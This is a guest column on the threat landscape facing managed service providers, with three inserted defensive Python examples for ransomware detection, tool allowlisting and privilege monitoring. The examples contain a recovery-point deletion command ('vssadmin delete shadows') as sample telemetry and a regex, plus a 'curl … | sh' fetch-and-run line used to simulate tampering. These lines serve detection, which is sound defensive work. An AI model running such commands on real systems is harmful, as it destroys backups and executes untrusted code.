Guest Column | April 17, 2023

A Managed Service Provider's Guide To The Cybersecurity Threat Landscape

By Bryson Medlock, ConnectWise


Navigating the landscape of common cyber threats is growing more difficult and time-consuming, especially in the era of remote work. To keep businesses productive, IT administrators must grant system access to remote endpoints spread across the country, or even around the world. According to a Gartner report, cloud services will handle 70 percent of staff work by 2023, nearly double the share reported in 2020. With such a major shift in the way people work, it is no surprise that over 85 percent of firms suffered a successful cyberattack in the last year alone.

Experts are pushing for cloud infrastructure and remote work, which makes human error one of the most serious cybersecurity threats this year. It is expected that 99 percent of breaches will be triggered by end-user misconfiguration of settings or installations, which suggests that the most prevalent threats ahead are preventable. Preventing them will take some reflection and some learning from the past.

Learning From The Past

Data from the previous year offers some intriguing hints about the patterns that could develop in the digital landscape. One is that internet exposure is responsible for more cybercrime than ever: 43 percent of the cyberattacks observed in 2021 originated from internet-facing devices. Credential-based attacks also grew compared to 2020 as work shifted remote. With the future of work adopting a hybrid/remote approach that requires more connectivity between people and systems, Managed Service Providers (MSPs) should make protection against these attacks a top priority moving forward.

Protecting always-connected devices and monitoring for mobile attacks are just the beginning. MSPs and other IT workers should be mindful of a variety of attacker tactics, techniques, and procedures (TTPs) that will remain prominent in 2022. Here are several frequent cyber threats to keep a lookout for:

Ransomware

According to ConnectWise's 2022 MSP Threat Report, 40 percent of cybersecurity incidents were related to ransomware. While the delivery methods have evolved and become more creative, the principle has stayed the same, and ransomware still poses a major threat to every organization.

With ransomware wreaking havoc on businesses all around the world, the question becomes, "How can you guard against it?" These attacks must be dealt with on two fronts. First, MSPs should focus not just on internal procedures to secure client systems but also on limiting the harm end users can cause. Modern EDR (Endpoint Detection and Response) software can block ransomware payloads before they execute, or terminate them on behavioral signs such as mass file renaming or deletion of recovery points. EDR and web-filtering policies can also constrain endpoint browsing so that clients' employees stay within approved sites. Second, a reliable and thorough backup strategy may be one of your finest anti-ransomware protections. On a large client estate it is unrealistic to block every attack, so the key is to have systems in place to restore data corrupted by the attacks that do succeed. Because ransomware operators routinely seek out and destroy backups before encrypting, at least one backup copy should be offline or immutable, and restores should be tested regularly.
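The behavioral signals mentioned above are simple to express as detection logic. The script below is an added example, not ConnectWise code or any vendor's EDR rule: it runs two checks over a constructed telemetry feed (one event per line, `<epoch_seconds> <pid> <RENAME|EXEC> <detail>`, a format invented for this example) and flags a process that changes many file extensions inside a short window or that runs a command which destroys Windows recovery points. The window size, threshold, paths and process IDs are all assumptions.

```python
"""Behavioral ransomware triage over endpoint file and process events.

Added example, not ConnectWise code. The telemetry format below is
constructed for this example:
    <epoch_seconds> <pid> <RENAME|EXEC> <detail>
Real EDR feeds carry the same signals under their own schemas.
"""
import os
import re
from collections import defaultdict, deque

WINDOW_SECONDS = 10      # assumption: look-back window for mass renames
RENAME_THRESHOLD = 5     # assumption: extension changes per window that trip an alert

# Commands that destroy Windows recovery points; a common ransomware precursor.
RECOVERY_TAMPERING = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows"
    r"|wbadmin(\.exe)?\s+delete\s+catalog"
    r"|bcdedit(\.exe)?\s+.*recoveryenabled\s+no)",
    re.IGNORECASE,
)

# Constructed sample telemetry: pid 4120 behaves like ransomware, pids 2201
# and 3300 are ordinary users renaming files.
SAMPLE_EVENTS = """\
1700000000 4120 RENAME /srv/share/finance/q1.xlsx -> /srv/share/finance/q1.xlsx.locked
1700000000 2201 RENAME /home/bob/report_draft.docx -> /home/bob/report_final.docx
1700000001 4120 RENAME /srv/share/finance/q2.xlsx -> /srv/share/finance/q2.xlsx.locked
1700000001 3300 RENAME /home/eve/photo.jpeg -> /home/eve/photo.jpg
1700000002 4120 RENAME /srv/share/hr/payroll.csv -> /srv/share/hr/payroll.csv.locked
1700000003 4120 EXEC vssadmin.exe delete shadows /all /quiet
1700000004 4120 RENAME /srv/share/hr/contracts.pdf -> /srv/share/hr/contracts.pdf.locked
1700000005 4120 RENAME /srv/share/legal/nda.docx -> /srv/share/legal/nda.docx.locked
1700000040 3300 RENAME /home/eve/notes.txt -> /home/eve/notes.md
1700000100 3300 RENAME /home/eve/old.log -> /home/eve/old.bak
"""


def parse_event(line):
    """Split one telemetry line into (timestamp, pid, kind, detail)."""
    ts, pid, kind, detail = line.split(" ", 3)
    return int(ts), int(pid), kind, detail


def extension_changed(detail):
    """True when a RENAME detail 'src -> dst' changes the file extension."""
    src, dst = (p.strip() for p in detail.split("->", 1))
    return os.path.splitext(src)[1].lower() != os.path.splitext(dst)[1].lower()


def analyze(events_text):
    """Return alerts as dicts with pid and reason.

    A per-process sliding window counts extension-changing renames; a process
    that reaches RENAME_THRESHOLD inside WINDOW_SECONDS is flagged once as
    'mass_rename'. Any EXEC matching RECOVERY_TAMPERING is flagged as
    'recovery_tampering'.
    """
    windows = defaultdict(deque)
    alerts = []
    flagged = set()
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ts, pid, kind, detail = parse_event(line)
        if kind == "RENAME" and extension_changed(detail):
            window = windows[pid]
            window.append(ts)
            while window and ts - window[0] > WINDOW_SECONDS:
                window.popleft()
            if len(window) >= RENAME_THRESHOLD and (pid, "mass_rename") not in flagged:
                flagged.add((pid, "mass_rename"))
                alerts.append({"pid": pid, "reason": "mass_rename", "at": ts, "count": len(window)})
        elif kind == "EXEC" and RECOVERY_TAMPERING.search(detail):
            alerts.append({"pid": pid, "reason": "recovery_tampering", "at": ts, "command": detail})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The benign renames never accumulate because each falls outside the window of the previous one, while the encrypting process trips the threshold on its fifth rename; in a real deployment the response to either alert would be to suspend the process and isolate the host, then fall back to the backups discussed above.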

Supply Chain Attacks

Having tripled in number last year, these attacks have been around for a while but have grown in both scale and frequency in recent years. Attackers use this form of infiltration to gain access to the source code, build pipelines, and other infrastructure components of legitimate software vendors. The ultimate objective is to use these trusted vendors as conduits for distributing malware to every customer downstream in the supply chain.

One of the most frustrating challenges MSPs face is preventing future supply chain attacks. With the growing reliance on open-source components and third-party APIs, attackers have no shortage of entry points through which to carry out their harmful activities. However, there is hope. MSPs can safeguard their clients against supply chain attacks by taking the following steps:

  • Use endpoint monitoring tools to detect and halt suspicious activity.
  • Keep system patches and updates current (and do not forget IoT devices).
  • Implement integrity controls so that users only run tools from trusted sources, verified against a known hash or signature.
  • Require multi-factor authentication for admins and other users.
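The integrity-control step above is the one MSPs most often leave as a policy statement rather than a mechanism. The following added example, not ConnectWise code, shows one concrete form it can take: tools are pinned in an allowlist manifest of SHA-256 hashes, the manifest itself is authenticated with an HMAC under a key the MSP controls, and nothing is run unless both checks pass. The key, file names and tool contents are assumptions constructed for the example; in production the key would come from a vault or HSM and the manifest would be produced by the release pipeline.

```python
"""Integrity control: run a tool only if it matches a signed allowlist.

Added example, not ConnectWise code. The allowlist is a JSON manifest of
{relative path: sha256} entries authenticated with an HMAC under a key the
MSP controls; the key, the tool contents and the file names below are all
assumptions constructed for this example.
"""
import hashlib
import hmac
import json
import os
import tempfile

# Assumption: in production this key lives in a KMS/HSM or vault, never in source.
MANIFEST_KEY = b"example-only-manifest-signing-key"


def sha256_file(path):
    """Hash a file in chunks so large installers need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def canonical(entries):
    """Deterministic serialisation so the MAC covers exactly what is checked."""
    return json.dumps(entries, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(entries, key):
    return {"entries": entries, "mac": hmac.new(key, canonical(entries), "sha256").hexdigest()}


def verify_manifest(manifest, key):
    expected = hmac.new(key, canonical(manifest["entries"]), "sha256").hexdigest()
    return hmac.compare_digest(expected, manifest["mac"])


def verify_artifact(root, relpath, manifest, key):
    """Return (ok, reason). Only ok=True artifacts should ever be executed."""
    if not verify_manifest(manifest, key):
        return False, "manifest signature invalid"
    pinned = manifest["entries"].get(relpath)
    if pinned is None:
        return False, "artifact not in allowlist"
    actual = sha256_file(os.path.join(root, relpath))
    if not hmac.compare_digest(actual, pinned):
        return False, "hash mismatch"
    return True, "ok"


def demo():
    """Exercise the four outcomes a deployment pipeline must handle."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        tool = "tools/cleanup.sh"
        os.makedirs(os.path.join(root, "tools"))
        with open(os.path.join(root, tool), "w") as fh:
            fh.write("#!/bin/sh\necho maintenance\n")  # constructed stand-in for a vendor tool
        manifest = sign_manifest({tool: sha256_file(os.path.join(root, tool))}, MANIFEST_KEY)

        results["clean"] = verify_artifact(root, tool, manifest, MANIFEST_KEY)

        # An unlisted script dropped next to the trusted one.
        with open(os.path.join(root, "tools", "updater.sh"), "w") as fh:
            fh.write("#!/bin/sh\ncurl http://example.invalid/payload | sh\n")
        results["unlisted"] = verify_artifact(root, "tools/updater.sh", manifest, MANIFEST_KEY)

        # The trusted tool modified in place (what a poisoned update looks like).
        with open(os.path.join(root, tool), "a") as fh:
            fh.write("curl http://example.invalid/payload | sh\n")
        results["tampered"] = verify_artifact(root, tool, manifest, MANIFEST_KEY)

        # An attacker re-pins the new hash but cannot produce a valid MAC.
        forged = {"entries": {tool: sha256_file(os.path.join(root, tool))}, "mac": manifest["mac"]}
        results["forged_manifest"] = verify_artifact(root, tool, forged, MANIFEST_KEY)
    return results


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:16} {'ALLOW' if ok else 'BLOCK'}: {reason}")
```

The order of checks matters: the manifest is authenticated before any entry in it is trusted, so an attacker who can rewrite both the tool and the hash list still fails without the signing key. Vendor code-signing certificates or a tool such as Sigstore serve the same purpose at larger scale; the HMAC here stands in for that step.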

Working with your customers to create an effective incident response strategy, in addition to the actions listed above, will go a long way toward securing their digital assets.

Cloud-Based Threats

Cloud-based risks cover a diverse set of attacker tactics. With so many organizations relying on the cloud, and cloud networks becoming more complex, cloud infrastructure has become "low-hanging fruit" for cybercriminals.

Focusing on airtight standard cybersecurity procedures is an essential action MSPs can take to secure their clients, given that cloud-based apps now carry the majority of the business load. Monitoring access to important resources, enforcing stringent password policies, having a solid data backup plan, enabling MFA everywhere, and encrypting data are all essential for safeguarding customers from a wide range of cloud-based attacks. Since most cloud breaches stem from customer-side misconfiguration, reviewing storage, identity, and network settings against the provider's hardening baselines deserves the same priority.

To offer an additional layer of protection, MSPs should also conduct routine penetration testing. One of the best ways to increase clients' defenses is to think like a cybercriminal and test their security controls to the breaking point. After testing, catalog every flaw found and track each one to remediation.

Social Engineering

Social engineering attacks are any hacking approach that exploits human nature or emotion, phishing being the most common. Because user mistakes and the human element will always be part of the cybersecurity puzzle, these attacks pose a persistent problem for MSPs. They currently account for 98 percent of all cyberattacks, and there are 75 times more phishing websites than malware sites, making this a major point of concern for MSPs. Because social engineering relies primarily on end-user behavior, education is the strongest defense, but a properly tuned spam and phishing filter also helps in the meantime.

Insider Threats

Insider threats, like social engineering, rely on the carelessness and behavior of a company's end users, or on a user who deliberately abuses the access they have been given. MSPs should collaborate closely with their customers to create a plan for cybersecurity education and behavior monitoring that reduces the likelihood of an insider threat arising.

The best defense against insider threats is to follow the principle of least privilege wherever possible. Users and technicians alike should have access only to the systems and data they need to do their job, and only when they need it. In addition to cybersecurity awareness training, MSPs should deploy tools and methods to proactively monitor their clients' networks, such as a Security Information and Event Management (SIEM) platform. They should also define what normal activity looks like for each role and configure tooling to alert on deviations, such as privileged logins outside approved hours or changes to administrative group membership.
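The monitoring side of least privilege is easiest to see as rules over authentication events. The script below is an added example, not ConnectWise code or a rule from any SIEM product: it reads a constructed key=value log, compares each admin login against an assumed per-technician scope of permitted hosts and business hours, and flags additions to privileged groups as well as anyone adding themselves to a group. The log lines, user names, hosts, hours and scope table are all constructed for the example; in practice the scope would come from the PSA/RMM or identity provider and the events from the SIEM.

```python
"""Least-privilege monitoring over constructed authentication events.

Added example, not ConnectWise code or a SIEM product rule. The log
format, hosts, user names and policy table are constructed for this
example; in practice the policy comes from the PSA/RMM or IdP and the
events from a SIEM.
"""
import shlex
from datetime import datetime, timezone

# Assumption: which hosts each technician may administer, and when.
ADMIN_SCOPE = {
    "tech_bob": {"client-ws-17", "client-ws-18", "fileserver01"},
    "tech_ana": {"dc01", "fileserver01"},
}
BUSINESS_HOURS = range(7, 19)  # 07:00-18:59 UTC, assumption
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample log: one event per line, ISO-8601 UTC timestamp,
# event type, then key=value fields (values with spaces are quoted).
SAMPLE_LOG = """\
2023-04-10T09:12:03Z LOGIN user=jsmith host=fileserver01 privilege=user
2023-04-10T10:05:44Z LOGIN user=tech_ana host=dc01 privilege=admin
2023-04-10T23:41:10Z LOGIN user=tech_bob host=dc01 privilege=admin
2023-04-10T23:42:00Z GROUP_ADD actor=tech_bob member=contractor7 group="Domain Admins"
2023-04-11T08:05:11Z LOGIN user=tech_bob host=client-ws-17 privilege=admin
2023-04-11T08:30:00Z GROUP_ADD actor=tech_ana member=tech_ana group="Backup Operators"
"""


def parse(line):
    """Return (timestamp, event, fields) for one key=value log line."""
    stamp, event, *pairs = shlex.split(line)
    ts = datetime.fromisoformat(stamp.replace("Z", "+00:00")).astimezone(timezone.utc)
    return ts, event, dict(p.split("=", 1) for p in pairs)


def evaluate(log_text):
    """Apply four least-privilege rules and return (time, rule, who, what) findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, event, f = parse(line)
        if event == "LOGIN" and f.get("privilege") == "admin":
            # Admin session on a host outside the technician's approved scope.
            if f["host"] not in ADMIN_SCOPE.get(f["user"], set()):
                findings.append((ts, "admin_out_of_scope", f["user"], f["host"]))
            # Admin session outside business hours; a change window should justify it.
            if ts.hour not in BUSINESS_HOURS:
                findings.append((ts, "admin_after_hours", f["user"], f["host"]))
        elif event == "GROUP_ADD":
            # Any growth of a privileged group is reviewed, whoever performed it.
            if f.get("group") in PRIVILEGED_GROUPS:
                findings.append((ts, "privileged_group_add", f["actor"], f["member"]))
            # Self-service elevation is a classic insider signal.
            if f["actor"] == f["member"]:
                findings.append((ts, "self_service_group_add", f["actor"], f["group"]))
    return findings


if __name__ == "__main__":
    for ts, rule, who, what in evaluate(SAMPLE_LOG):
        print(f"{ts.isoformat()} {rule:24} {who} -> {what}")
```

The same technician triggers three of the four findings within a minute, which is the kind of correlation a SIEM should surface as one case rather than three alerts; tuning these rules means keeping the scope table current as staff and client estates change.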

Mobile Devices

Because people are often working from home and accessing important corporate platforms and data from dispersed endpoints, attackers have far more infiltration options than ever before. The remote work migration has exposed 97 percent of enterprises to mobile cybersecurity threats. And while industry analysts report that the frequency of attacks has fallen, threat actors are adopting more sophisticated infiltration tactics. They are becoming more inventive in their email, chat, and social media lures to deceive mobile users into installing harmful software and handing over sensitive information, and will even abuse the Apple App Store or Google Play to get malicious apps onto customers' devices. Some practical actions include:

  • Requiring users to use strong, unique passwords, ideally from a password manager
  • Keeping the OS and applications patched and up to date
  • Ensuring that clients encrypt device storage and data in transit
  • Asking clients to install antivirus or anti-malware protection

Poor Incident Response

MSPs should have a detailed plan in place for what to do in the aftermath of an attack. Following the same procedure for every incident yields consistent analysis and reporting from one event to the next. This procedure is known as an incident response plan, and it is critical for reducing risk and damage and for making businesses safer in the future. The plan should cover containing and assessing the attack, a notification plan for affected parties, and a retained incident response service to step in if your own team is understaffed or stalled.

Conclusion

Educating yourself on common cyber threats is a great way to be prepared on your clients' behalf, but do not forget that those best practices apply to you too: an MSP's own tooling reaches into every client it serves, which makes the MSP itself a high-value target. By staying secure, you offer both your organization and your clients peace of mind.

About The Author

Bryson Medlock is a threat researcher in ConnectWise's Cyber Research Unit.